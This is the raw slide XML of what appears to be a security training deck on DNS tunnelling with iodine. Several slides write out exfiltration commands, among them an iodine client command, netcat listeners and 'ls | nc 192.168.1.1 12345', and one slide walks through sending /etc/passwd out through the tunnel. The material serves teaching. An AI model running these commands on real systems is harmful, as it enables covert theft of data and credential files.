      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370604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configure the iodine client to establish the DNS tunnel. This process involves a few steps. First, ensure iodine is installed on your client machine. You can do this by following the same installation steps we discussed earlier for the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To start the iodine client, use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> iodine -f -P &lt;password&gt; -T A &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>domain_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Here's what each part of the command does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Starts iodine in the foreground for interactive use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-P &lt;password&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specifies the password used to authenticate the client to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-T A: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets the tunnel type to A-type DNS records.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specifies the IP address of the iodine server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>domain_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defines the domain name controlled by the attacker for DNS tunneling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> iodine -f -P password -T A 192.168.1.1 fake-domain.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starts the iodine client and connects it to the iodine server at IP address 192.168.1.1, using the domain fake-domain.org and password 'password'. This setup enables the client to encode data into DNS queries and send it through the established covert channel to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once both the server and client commands are successfully executed, the DNS tunnel is established, allowing for covert data transfer between the client and server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, let's explore exfiltration methods to understand how data is transmitted through this tunnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1326318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Method 1: Exfiltrating the Output of a Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this method, we explore how data can be exfiltrated through the DNS tunnel from the client to the server. On the server side, we set up a command using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to listen for incoming connections and capture the output. The command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p &lt;port&gt; &gt; received_command_output.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accomplishes this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Utilizes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for network connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-l: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Places </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in listening mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-p &lt;port&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specifies the port number to listen on for incoming data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>received_command_output.txt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirects and saves the received data to a file on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p 12345 &gt; received_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to listen on port 12345 and saves the incoming data to the file received_data.txt. This setup enables capturing the output of commands executed on the client side and transmitting it securely through the established DNS tunnel to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4206985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we can exfiltrate data from the client side through the established DNS tunnel to the server. This method involves using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to send the output of a command over the network to the server. Here's how it works:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;command&gt; | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;command&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace this with any shell command you want to execute on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>|:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This symbol pipes the output of the command to the next command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Short for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a utility for sending data over networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Specify the IP address of the server where the data will be sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;port&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The port number on which the server is listening to receive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ls | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 192.168.1.1  12345 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executes the ls command to list the contents of the current directory on the client side. The output of ls is then sent through the DNS tunnel to the server at IP address 192.168.1.1, listening on port 12345.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This method showcases how commands executed on the client side can securely transmit their output through DNS tunneling to the server, enabling covert data exfiltration. It demonstrates the practical application of DNS tunneling in securely transferring sensitive information. Next, let's explore additional techniques for utilizing DNS tunneling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275527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kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Method 2: Exfiltrating the /etc/passwd File</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this method, we explore how to exfiltrate sensitive data, such as the contents of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd file, through the established DNS tunnel from the client to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the server side, we set up a command using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to listen for incoming connections and capture the data. The command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p &lt;port&gt; &gt; password_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accomplishes this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p &lt;port&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to listen on the specified port for incoming connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>password_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Redirects and saves the received data to a file named password_data.txt on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -l -p 12345 &gt; password_data.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to listen on port 12345 and saves the incoming data to the file password_data.txt. This setup enables capturing the contents of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd file from the client through the DNS tunnel to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0584A200-3E6B-4492-8D87-7229F4EB3E82}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1549090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1761E5-DE9A-4625-B631-89FD25FD9780}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2CB9A9-75AD-7ED2-0DB8-216110D964D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC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57B66C-AAB3-4E18-81F4-5E7C2F9DABEF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{714C078A-2538-98BF-DAB8-351544909959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC </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B668C6-E1B7-4172-BD5E-9E71EE62C64F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E0C9E6-228D-FF68-E9D9-A354315FA3F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC </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6F801E-4120-464D-B90D-DE56556FDBED}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7F4AEAE-183F-4396-A09F-3B49F51A8D17}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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4267" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>System Administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4267" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4267" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>with Windows  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
